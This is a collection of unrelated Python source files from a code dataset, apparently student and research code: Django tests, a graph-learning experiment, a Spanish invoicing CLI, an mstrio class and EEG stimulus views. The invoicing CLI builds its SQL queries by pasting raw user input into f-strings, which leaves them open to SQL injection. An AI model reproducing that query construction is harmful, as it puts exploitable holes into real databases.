punch():\n\tclick_menu()\n\tclick_punch()\n\tclick_stop(1.6)\n\tclick_stop(2)\n\tclick_stop(3.05)\n\tclick_stop(3.1)\n\ttime.sleep(40)\n\tget_rewards(4)\n\tget_rewards(4)\n\tget_rewards(4)\n\n\nif __name__ == '__main__':\n\tn = 30\n\twhile n > 0:\n\t\tpunch()\n\t\tn -= 1\n\t#output_cords()","sub_path":"src/az_puncher.py","file_name":"az_puncher.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574717617","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse, resolve\nfrom allauth.account.views import SignupView\n\n\nclass CustomUserTests(TestCase):\n def test_create_user(self):\n User = get_user_model()\n user = User.objects.create_user(\n username='dannv',\n email='dannv@email.com',\n password='testpass123456'\n )\n self.assertEqual(user.username, 'dannv')\n self.assertEqual(user.email, 'dannv@email.com')\n self.assertTrue(user.is_active),\n self.assertFalse(user.is_staff)\n self.assertFalse(user.is_superuser)\n \n def test_create_superuser(self):\n User = get_user_model()\n user = User.objects.create_superuser(\n username='superadmin',\n email='admin@superuser.com',\n password='123456a@'\n )\n self.assertEqual(user.username, 'superadmin')\n self.assertEqual(user.email, 'admin@superuser.com')\n self.assertTrue(user.is_active)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_superuser)\n\n\nclass SignupPageTests(TestCase):\n username = \"newuser\"\n email = \"newuser@email.com\"\n\n def setUp(self):\n url = reverse('account_signup')\n self.resp = self.client.get(url)\n\n def test_signup_template(self):\n self.assertEqual(self.resp.status_code, 200)\n self.assertTemplateUsed(self.resp, 'account/signup.html')\n self.assertContains(self.resp, 'Sign Up')\n self.assertNotContains(self.resp, 'Hi there! 
I should not be on the page.')\n\n def test_signup_form(self):\n get_user_model().objects.create_user(self.username, self.email)\n self.assertContains(self.resp, 'csrfmiddlewaretoken')\n self.assertEqual(get_user_model().objects.all().count(), 1)\n self.assertEqual(get_user_model().objects.all()[0].username, self.username)\n self.assertEqual(get_user_model() .objects.all()[0].email, self.email)\n\n def test_signup_view(self):\n view = resolve('/accounts/signup/')\n self.assertEqual(view.func.__name__, SignupView.as_view().__name__)\n","sub_path":"users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337402138","text":"## Graph learning and signal learning \r\nimport numpy as np\r\nfrom matplotlib.pylab import *\r\nimport matplotlib.pyplot as plt\r\nimport os \r\nos.chdir('C:/Kaige_Research/Graph Learning/graph_learning_code/')\r\nfrom sklearn.metrics.pairwise import rbf_kernel, euclidean_distances\r\nimport seaborn as sns\r\nfrom synthetic_data import *\r\nfrom primal_dual_gl import Primal_dual_gl \r\nfrom utils import *\r\nfrom pygsp import graphs, plotting, filters\r\nimport pyunlocbox\r\nimport networkx as nx \r\nfrom gl_sigrep import Gl_sigrep\r\npath='C:/Kaige_Research/Graph Learning/graph_learning_code/results/test_results2/'\r\ntimeRun = datetime.datetime.now().strftime('_%m_%d_%H_%M_%S') \r\n\r\nnode_num=20\r\nsignal_num=100\r\nerror_sigma=0.1\r\nadj_matrix, knn_lap, knn_pos=rbf_graph(node_num)\r\nX, X_noise, item_features=generate_signal(signal_num, node_num, knn_pos, error_sigma)\r\n\r\nnewpath=path+'error_sigma_%s'%(int(error_sigma*100))+str(timeRun)+'/'\r\nif not os.path.exists(newpath):\r\n\t os.makedirs(newpath)\r\n\r\nsignals=X_noise\r\n\r\nsignal_error_reference=[]\r\nsignal_error_list=[]\r\ngraph_error_list=[]\r\ntrace1=[]\r\ntrace2=[]\r\ntrace3=[]\r\ntrace4=[]\r\ntrace5=[]\r\nsmoothness=[]\r\nprimal_adj=np.identity(node_num)\r\nfor i in range(5):\r\n\tprint('i', i)\r\n\tZ=euclidean_distances(signals.T, squared=True)\r\n\tnp.fill_diagonal(Z, 0)\r\n\tZ=norm_W(Z, node_num)\r\n\r\n\t##graph learning \r\n\talpha=1## bigger alpha --- bigger weights\r\n\tbeta=0.2 ### bigger beta --- more dense ## For GL_sigrep beta is not used.\r\n\ttheta=0.01\r\n\t#primal_gl=Gl_sigrep(node_num, Z, alpha=alpha, beta=beta, step_size=0.5)\r\n\tprimal_gl=Primal_dual_gl(node_num, Z, alpha=alpha, beta=beta, step_size=0.01)\r\n\tprimal_adj, error=primal_gl.run(adj_matrix)\r\n\tlaplacian=csgraph.laplacian(primal_adj, normed=False)\r\n\tsignals=np.dot(signals, np.linalg.inv((np.identity(node_num)+theta*laplacian)))\r\n\tsmooth=calculate_smoothness(signals, laplacian)\r\n\tsmoothness.append(smooth)\r\n\r\n\r\n\t#print('adj_matrix \\n', adj_matrix)\r\n\t#print('primal_adj \\n', primal_adj)\r\n\r\n\tprint('X\\n', X[0,:])\r\n\tprint('signals\\n', signals[0,:])\r\n\r\n\tsignal_error_ref=np.linalg.norm(X_noise-X)\r\n\tsignal_error=np.linalg.norm(signals-X)\r\n\tgraph_error=np.linalg.norm(primal_adj-adj_matrix)\r\n\tsignal_error_reference.extend([signal_error_ref])\r\n\tsignal_error_list.extend([signal_error])\r\n\tgraph_error_list.extend([graph_error])\r\n\r\n\ttr1=np.trace(np.dot(signals, np.dot(laplacian, signals.T) ))\r\n\ttr2=np.trace(np.dot(signals, np.dot(knn_lap, signals.T)))\r\n\ttrace1.extend([tr1])\r\n\ttrace2.extend([tr2])\r\n\r\n\ttr3=np.trace(np.dot(X, np.dot(laplacian, X.T) ))\r\n\ttr4=np.trace(np.dot(X, np.dot(knn_lap, 
X.T)))\r\n\ttrace3.extend([tr3])\r\n\ttrace4.extend([tr4])\r\n\r\n\ttr5=np.trace(np.dot(X_noise, np.dot(knn_lap, X_noise.T)))\r\n\ttrace5.extend([tr5])\r\n\r\n \r\n\r\n\r\n\r\n\r\nplt.plot(signal_error_reference, label='X_noise/X')\r\nplt.plot(signal_error_list, label='Signal/X')\r\nplt.title('signal error', fontsize=12)\r\nplt.legend(loc=1)\r\nplt.show()\r\n\r\nplt.plot(graph_error_list)\r\nplt.title('graph error', fontsize=12)\r\nplt.show()\r\n\r\n\r\n#plt.plot(trace1, label='signal/lap')\r\nplt.plot(trace2, label='signal/knn')\r\n#plt.plot(trace3, label='X/lap')\r\nplt.plot(trace4, label='X/knn')\r\nplt.plot(trace5, label='X_noise/knn')\r\nplt.legend(loc=1)\r\nplt.show()\r\n\r\n\r\ns=np.array(smoothness)\r\nfor i in range(len(s)):\r\n\tplt.plot(s[i], label='%s'%(i))\r\nplt.legend(loc=1)\r\nplt.show()\r\n\r\n\r\nreal_signal=X[0,:]\r\n#noise_signal=X\r\nlearned_signal=signals[0,:]\r\n\r\nreal_graph=create_networkx_graph(node_num, adj_matrix)\r\nedge_num=real_graph.number_of_edges()\r\nedge_weights=adj_matrix[np.triu_indices(node_num,0)]\r\nedge_color=edge_weights[edge_weights>0]\r\nedge_alpha=edge_color\r\nnodes=nx.draw_networkx_nodes(real_graph, knn_pos, node_color=real_signal,node_size=100, cmap=plt.cm.Reds)\r\nedges=nx.draw_networkx_edges(real_graph, knn_pos, width=1.0, alpha=1.0, edge_color=edge_color, edge_cmap=plt.cm.Blues)\r\nplt.axis('off')\r\nplt.show()\r\n\r\n\r\n\r\n#primal_adj=filter_graph_to_knn(primal_adj, node_num)\r\nprimal_adj[primal_adj<10**(-4)]=0\r\nlearned_graph=create_networkx_graph(node_num, primal_adj)\r\nedge_num=learned_graph.number_of_edges()\r\nedge_weights=primal_adj[np.triu_indices(node_num,0)]\r\nedge_color=edge_weights[edge_weights>0]\r\nedge_alpha=edge_color\r\nnodes=nx.draw_networkx_nodes(learned_graph, knn_pos, node_color=learned_signal,node_size=100, cmap=plt.cm.Reds)\r\nedges=nx.draw_networkx_edges(learned_graph, knn_pos, width=1.0, alpha=1.0, edge_color=edge_color, edge_cmap=plt.cm.Blues,)\r\nplt.axis('off')\r\nplt.show()\r\n\r\nplt.plot(error)\r\nplt.title('graph learning error', fontsize=12)\r\nplt.show()\r\n\r\n\r\nfig,(ax1, ax2)=plt.subplots(1,2, figsize=(4,2))\r\nax1.pcolor(adj_matrix, cmap='RdBu')\r\nax1.set_title('real W')\r\nax2.pcolor(primal_adj, cmap='RdBu')\r\nax2.set_title('learned w')\r\nplt.show()\r\n","sub_path":"gl_loop.py","file_name":"gl_loop.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85773233","text":"import logging\nimport colorlog\n\nFORMATTER = '%(asctime)s - %(levelname)s - %(message)s'\nCOLOUR_FORMATTER = '%(log_color)s' + FORMATTER\n\ndef get_console_handler():\n console_handler = colorlog.StreamHandler()\n console_handler.setFormatter(colorlog.ColoredFormatter(COLOUR_FORMATTER))\n return console_handler\n\ndef get_file_handler():\n file_handler = logging.FileHandler('pi_system_metrics.log')\n file_handler.setFormatter(logging.Formatter(FORMATTER))\n return file_handler\n\ndef get_logger(logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(get_console_handler())\n logger.addHandler(get_file_handler())\n return logger\n","sub_path":"pi_system_metrics/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512724654","text":"from datetime import datetime\nimport os\nimport conexion\n# Definicion de clases\nclass Menu:\n def __init__(self, lstOpciones, 
strTitulo, strMenuDescr):\n self.lstOpciones = lstOpciones\n self.strTitulo = strTitulo\n self.strMenuDescr = strMenuDescr\n self.OptionSelect = 0\n def show(self):\n os.system(\"cls\")\n print(f\"\\033[1;32;40m\")\n print(20*\":\" + f\"{self.strTitulo:^20}\" + 20*\":\")\n print(20*\":\" + f\"{self.strMenuDescr:^20}\" + 20*\":\")\n for k, v in self.lstOpciones.items():\n print(k, \"::\", v)\n print(\"9 :: Salir\")\n while True:\n try:\n self.OptionSelect = int(input(\"Ingrese su opción: \"))\n if self.OptionSelect > 0 and self.OptionSelect < len(self.lstOpciones)+1:\n return self.OptionSelect\n elif self.OptionSelect == 9:\n break\n else:\n print(\"Ingrese alguna de las opciones mostradas\")\n except ValueError:\n print(\"Ingresa un número entero\")\nclass Factura:\n Fecha=\"\"\n ID=\"\"\n IGV=\"\"\n IDFAC=\"\"\n def create():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n Factura.ID = input(\"Escriba el ID del cliente a facturar: \")\n Factura.IGV = input(\"Ingrese el porcentaje de IGV a aplicar: \")\n Factura.Fecha = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n query = f\"insert into faccabecera (idCliente,igvFacCabecera,subtotalFacCabecera,totalFacCabecera,fechaFacCabecera,estadoFacCabecera) values ('{Factura.ID}', '{Factura.IGV}','0','0','{Factura.Fecha}','0');\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n def agregarProd():\n conn = conexion.conexionBDD(1)\n query = \"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n query = f\"SELECT idFacCabecera from faccabecera where fechaFacCabecera='{Factura.Fecha}'and idCliente='{Factura.ID}';\"\n resConn = conn.consultarBDD(query)\n Factura.IDFAC= resConn[0][0]\n idProducto= input(\"Ingrese el ID del producto a facturar: \")\n Cant = input(\"Ingresa la cantidad del producto a facturar: \")\n query = f\"select valorProducto from producto where idProducto= {idProducto};\"\n resConn = conn.consultarBDD(query)\n Precio = resConn[0][0]\n print(Precio)\n query = f\"insert into facdetalle(idFacCabecera,idProducto,cantFacDetalle,valorFacDetalle) values ('{Factura.IDFAC}','{idProducto}','{Cant}','{Precio}')\"\n resConn = conn.ejecutarBDD(query) \n def show():\n conn = conexion.conexionBDD(1)\n query = f\"select idFacCabecera,fechaFacCabecera,subtotalFacCabecera,igvFacCabecera,totalFacCabecera from faccabecera where idFacCabecera='{Factura.IDFAC}'\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tFecha\\t\\t\\t\\tSubtotal\\t\\tIGV\\t\\tTotal\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n query= f\"select nombreProducto, cantFacDetalle,valorFacDetalle from facdetalle t1 inner join producto t2 on t1.idProducto = t2.idProducto where idFacCabecera={Factura.IDFAC}\"\n print(\"\")\n print(\"\\t\\t\\tProducto\\t\\tCantidad\\t\\tDetalle\")\n resConn = conn.consultarBDD(query)\n for row in resConn:\n print(f\"\\t\\t\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t\\t{str(row[2])}\") 
\n input(\"continuar???\")\n def showall():\n conn = conexion.conexionBDD(1)\n query = f\"select idFacCabecera,fechaFacCabecera,subtotalFacCabecera,igvFacCabecera,totalFacCabecera from faccabecera\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tFecha\\t\\t\\t\\tSubtotal\\t\\tIGV\\t\\tTotal\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n input(\"continuar???\")\nclass Cliente:\n def show():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n input(\"continuar???\")\n def search():\n dni = int(input(\"Ingrese el DNI del cliente: \"))\n conn = conexion.conexionBDD(1)\n query = f\"select * from cliente where dniCliente = '{dni}';\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n input(\"continuar???\")\n def modify():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n id = input(\"Ingrese el id del cliente a modificar: \")\n dni = input(\"Ingrese el nuevo DNI: \")\n nombre = input(\"Escriba el nuevo nombre: \")\n apellido = input(\"Escriba el nuevo apellido: \")\n correo = input(\"Escriba el nuevo correo: \")\n query = f\"update cliente set dniCliente = '{dni}', nombreCliente = '{nombre}', apellidoCliente = '{apellido}', correoCliente = '{correo}' where idCliente = {id};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def create():\n conn = conexion.conexionBDD(1)\n dni = input(\"Ingrese el DNI del nuevo cliente: \")\n nombre = input(\"Escriba el nombre del nuevo cliente: \")\n apellido = input(\"Escriba el apellido del nuevo cliente: \")\n correo = input(\"Escriba el correo del nuevo cliente: \")\n query = f\"insert into cliente (dniCliente,nombreCliente,apellidoCliente,correoCliente) values ('{dni}','{nombre}','{apellido}','{correo}')\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def delete():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n idCliente = input(\"Ingrese el ID del cliente a eliminar: \")\n query = f\"delete from cliente where idCliente = {idCliente};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\nclass Producto:\n def show():\n conn = conexion.conexionBDD(1)\n query = \"select * from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n 
print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n input(\"continuar???\")\n def search():\n id = int(input(\"Ingrese el ID del producto: \"))\n conn = conexion.conexionBDD(1)\n query = f\"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto where idProducto = '{id}';\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n input(\"continuar???\")\n def modify():\n conn = conexion.conexionBDD(1)\n query = \"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n idProducto = input(\"Ingrese el ID del producto a modificar: \")\n nombre = input(\"Escriba el nuevo nombre: \")\n valor = input(\"Escriba el nuevo valor: \")\n igv = input(\"Escriba si aplica IGV(1) o no aplica IGV(0) : \")\n query = f\"update producto set nombreProducto = '{nombre}', valorProducto = '{valor}',igvProducto = '{igv}' where idProducto = {idProducto};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def create():\n conn = conexion.conexionBDD(1)\n nombre = input(\"Escriba el nombre del nuevo producto: \")\n valor = input(\"Escriba el valor del nuevo producto: \")\n igv = input(\"Escriba si aplica IGV(1) o no aplica IGV(0) al nuevo producto: \")\n query = f\"insert into producto (nombreProducto, valorProducto, igvProducto) values ('{nombre}','{valor}','{igv}');\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def delete():\n conn = conexion.conexionBDD(1)\n query = \"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n idProducto = input(\"Ingrese el ID del producto a eliminar: \")\n query = f\"delete from producto where idProducto = {idProducto};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n# Definición de todos los menus:\nmenuPrincipal = Menu({1: \"Crear Factura\", 2: \"Mantenimientos\"},\n \"VENTAS GROUP S.A.\", \"Menú Principal\")\nmenuFactura = Menu({1: \"Crear Factura\", 2: \"Ver todas las facturas\"},\n \"VENTAS GROUP S.A.\", \"Menú Factura\")\nmenuMantenimiento = Menu({1: \"Clientes\", 2: \"Productos\"},\n \"VENTAS GROUP S.A.\", \"Menú Mantenimiento\")\nmenuMantCliente = Menu({1: \"Mostrar todos los clientes\", 2: \"Buscar cliente por DNI\", 3: \"Modificar cliente\", 4: \"Crear Cliente\", 5: \"Borrar Cliente\"},\n \"VENTAS GROUP S.A.\", \"Menú Mantenimiento Clientes\")\nmenuMantProductos = Menu({1: \"Mostrar todos los productos\", 2 : \"Buscar producto por ID\", 3 : \"Modificar producto\", 4 : \"Crear Producto\", 5 : \"Borrar producto\"},\n \"VENTAS GROUP S.A.\", \"Menu mantenimiento Productos\")\n# Menu de navegación\nwhile True:\n intOptionSelect = 
menuPrincipal.show()\n    if intOptionSelect == 1: # Invoice menu\n        while True:\n            intOptionSelect = menuFactura.show()\n            if intOptionSelect == 1: # Create invoice\n                Factura.create()\n                Factura.agregarProd()\n                while True:\n                    more = input(\"¿Desea agregar mas productos S/N: ?\")\n                    if more==\"S\":\n                        Factura.agregarProd()\n                    elif more ==\"N\":\n                        conn = conexion.conexionBDD(1)\n                        query = f\"select nombreProducto, cantFacDetalle,valorFacDetalle from facdetalle t1 inner join producto t2 on t1.idProducto = t2.idProducto where idFacCabecera='{Factura.IDFAC}'; \"\n                        resConn = conn.consultarBDD(query)\n                        acumulado = 0\n                        for i in resConn:\n                            acumulado += int(i[1])*int(i[2])\n                        acumuladototal = (acumulado+acumulado*int(Factura.IGV)/100)\n                        query = f\"update faccabecera set subtotalFacCabecera={acumulado}, totalFacCabecera={acumuladototal} where idFacCabecera='{Factura.IDFAC}'\"\n                        resConn = conn.ejecutarBDD(query)\n                        break\n                    else: \n                        print(\"Ingrese S o N\")\n                Factura.show()\n            elif intOptionSelect == 2: # View all invoices\n                Factura.showall()\n            else:\n                break\n    elif intOptionSelect == 2: # Maintenance menu\n        while True:\n            intOptionSelect = menuMantenimiento.show()\n            if intOptionSelect == 1: # Customer maintenance\n                while True:\n                    intOptionSelect = menuMantCliente.show()\n                    if intOptionSelect == 1: # Show all customers\n                        Cliente.show()\n                    elif intOptionSelect == 2: # Search customer by DNI\n                        Cliente.search()\n                    elif intOptionSelect == 3: # Modify customer\n                        Cliente.modify()\n                    elif intOptionSelect == 4: # Create customer\n                        Cliente.create()\n                    elif intOptionSelect == 5: # Delete customer\n                        Cliente.delete()\n                    else:\n                        break\n            elif intOptionSelect == 2: # Product maintenance \n                while True:\n                    intOptionSelect = menuMantProductos.show()\n                    if intOptionSelect == 1: # Show all products\n                        Producto.show()\n                    elif intOptionSelect == 2: # Search product by ID\n                        Producto.search()\n                    elif intOptionSelect == 3: # Modify product\n                        Producto.modify()\n                    elif intOptionSelect == 4: # Create product\n                        Producto.create()\n                    elif intOptionSelect == 5: # Delete product\n                        Producto.delete()\n                    else:\n                        break\n            else:\n                break\n    else:\n        break\n","sub_path":"Semana6Hackaton/bporras/app/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":14985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"506916316","text":"from typing import Dict, List, Optional, TYPE_CHECKING, Union\n\nfrom mstrio.access_and_security.security_filter import (LogicOperator, PredicateElementList,\n                                                        PredicateFilter, PredicateForm,\n                                                        PredicateJointElementList)\nfrom mstrio.utils.helper import Any, Dictable\n\nif TYPE_CHECKING:\n    from mstrio.access_and_security.security_filter import PredicateBase\n    from mstrio.connection import Connection\n\n\nclass Qualification(Dictable):\n    \"\"\"The security filter definition written as an expression tree over\n    predicate nodes.\n\n    We do not attempt to represent the entire filter using expression nodes.\n    Instead we use predicate nodes as leaves of the main tree expression.\n\n    Most predicate nodes use a simple data structure. Security filters support\n    five types of predicates, including: `PredicateCustomExpression`,\n    `PredicateJointElementList`, `PredicateElementList`, `PredicateForm`,\n    `PredicateFilter`. These simple predicates correspond to the most common\n    qualifications that are used in security filters. 
It is possible to combine\n predicates using class `LogicOperator`.\n\n It is invalid for a security filter expression to contain no nodes.\n\n Attributes:\n tree (dict): security filter definition written as an expression tree\n over predicate nodes\n text (string): human readable description of the expression. It is\n generated from the current specification of the expression. This\n string will appear similar to a parsable description of the\n expression in the current user's locale. It is intended to be used\n to allow a user to easily distinguish between expressions. But this\n string cannot actually be used as input to a parser session because\n it does not contain hidden information about ambiguities in the\n parse text. Since this representation is not able to fully describe\n an expression, there is no point in the client ever sending it to\n the service.\n tokens (array of dicts): optional array, used if the expression is to\n be presented as a stream of tokens. When this representation is\n used by the service we would expect that the tokens would either\n completely parse the expression, or would describe an error in the\n parsing. When this representation is used by the client the tokens\n would either correspond to fresh text from the user (a `client`\n token) or to parts of the text that the user has not edited\n (a `parsed` token).\n \"\"\"\n\n def __init__(self, tree: Union[\"LogicOperator\", \"PredicateBase\"], text: Optional[str] = None,\n tokens: Optional[List[dict]] = None):\n self.tree = tree\n self.text = text\n self.tokens = tokens\n\n @classmethod\n def from_dict(cls, source: Dict[str, Any], connection: Optional[\"Connection\"] = None):\n tree = source.get(\"tree\")\n tree_type = tree.get(\"type\")\n if tree_type == \"predicate_form_qualification\":\n tree = PredicateForm.from_dict(tree, connection)\n elif tree_type == \"predicate_joint_element_list\":\n tree = PredicateJointElementList.from_dict(tree, connection)\n elif tree_type == \"predicate_filter_qualification\":\n tree = PredicateFilter.from_dict(tree, connection)\n elif tree_type == \"predicate_element_list\":\n tree = PredicateElementList.from_dict(tree, connection)\n elif tree_type == \"operator\":\n tree = LogicOperator.from_dict(tree, connection)\n else:\n tree = None\n new_source = source.copy()\n new_source[\"tree\"] = tree\n return super().from_dict(new_source, connection)\n","sub_path":"mstrio/access_and_security/security_filter/qualification.py","file_name":"qualification.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379131272","text":"#-*- coding: utf-8 -*-\r\nimport datetime\r\nimport parallel\r\nfrom .modules import createstimuli\r\n\r\n\r\nfrom django.contrib import messages\r\nfrom django.shortcuts import render\r\n\r\nfrom eegbrowse.forms import LoginForm\r\nfrom eegbrowse.forms import NextForm\r\nfrom .modules.marker import baparallel\r\n\r\n\r\n# def hello(request):\r\n# text = \"\"\"
    welcome to my app !
    \"\"\"\r\n# return HttpResponse(text)\r\n\r\n\r\n# def hello(request):\r\n# today = datetime.datetime.now().date()\r\n# return render(request, \"hello.html\", {\"today\" : today})\r\np = parallel.Parallel()\r\np.setData(0)\r\n\r\ndef hello(request):\r\n today = datetime.datetime.now().date()\r\n daysOfWeek = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n return render(request, \"helloworld.html\", {\"today\": today, \"days_of_week\": daysOfWeek})\r\n\r\ndef image(request):\r\n if 'concepts_list' not in request.session:\r\n # print(\"I am here in the if\")\r\n concepts = createstimuli.get_concepts()\r\n concepts_list = createstimuli.create_shuffled_stimuli(concepts)\r\n request.session['concepts_list'] = concepts_list\r\n request.session['iteration'] = 0\r\n# print(\"These are the concepts: %s\" % concepts_list)\r\n else:\r\n# print(\"I am here in the else\")\r\n concepts_list = request.session['concepts_list']\r\n\r\n # print(\"These are the concepts: %s\" % request.session['concepts_list'])\r\n # print(\"This is the session: %s\" % request.session.keys())\r\n if request.session['iteration'] < len(concepts_list):\r\n mode = concepts_list[request.session['iteration']][0]\r\n concept = concepts_list[request.session['iteration']][1]\r\n request.session['iteration'] = request.session['iteration'] + 1\r\n iteration = request.session['iteration'] - 1\r\n \r\n i = iteration % 255 + 1\r\n print(\"Marker: %d\" % i)\r\n p.setData(i)\r\n return render(request, \"image.html\", {\"mode\": mode, \"concept\": concept.lower(), \"iteration\": iteration})\r\n else:\r\n return render(request, \"start.html\")\r\n\r\ndef sound(request):\r\n return render(request, \"sound.html\")\r\n\r\ndef text(request):\r\n return render(request, \"text.html\")\r\n\r\n\r\ndef start(request):\r\n request.session.flush()\r\n return render(request, \"start.html\")\r\n\r\n\r\ndef login(request):\r\n username = \"not logged in\"\r\n\r\n if request.method == \"POST\":\r\n # Get the posted form\r\n MyLoginForm = LoginForm(request.POST)\r\n if MyLoginForm.is_valid():\r\n username = MyLoginForm.cleaned_data['username']\r\n else:\r\n messages.error(request, \"Error\")\r\n else:\r\n MyLoginForm = LoginForm()\r\n\r\n return render(request, 'loggedin.html', {\"username\": username})\r\n\r\n","sub_path":"stimulipresenter/eegbrowse/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"639259808","text":"import save\nimport sys\ndef menu():\n c=0\n a=1\n while c < a:\n optionen = (['weiter', 'Speichern', 'exit'])\n for i, x in enumerate(optionen):\n print(f\"{i+1}.\", x)\n aktion = int(input('\\nWähle deine Aktion '))\n if aktion == 1:\n break\n if aktion == 2:\n save.save()\n break\n if aktion == 3:\n os._exit(1)\nmenu()\n","sub_path":"spielermenu.py","file_name":"spielermenu.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"621462195","text":"# Various Utility Functions to be used elsewhere\nimport string\nimport re\nimport json\nimport random\nfrom collections import defaultdict\nimport os\nfrom os.path import join\nimport sys\nimport logging\n# import gensim\nimport pickle\n\nimport numpy as np\nimport torch\nfrom torch.nn import DataParallel\n\nfrom src.utils.file import FileObjectStore\n\n# Leave this here 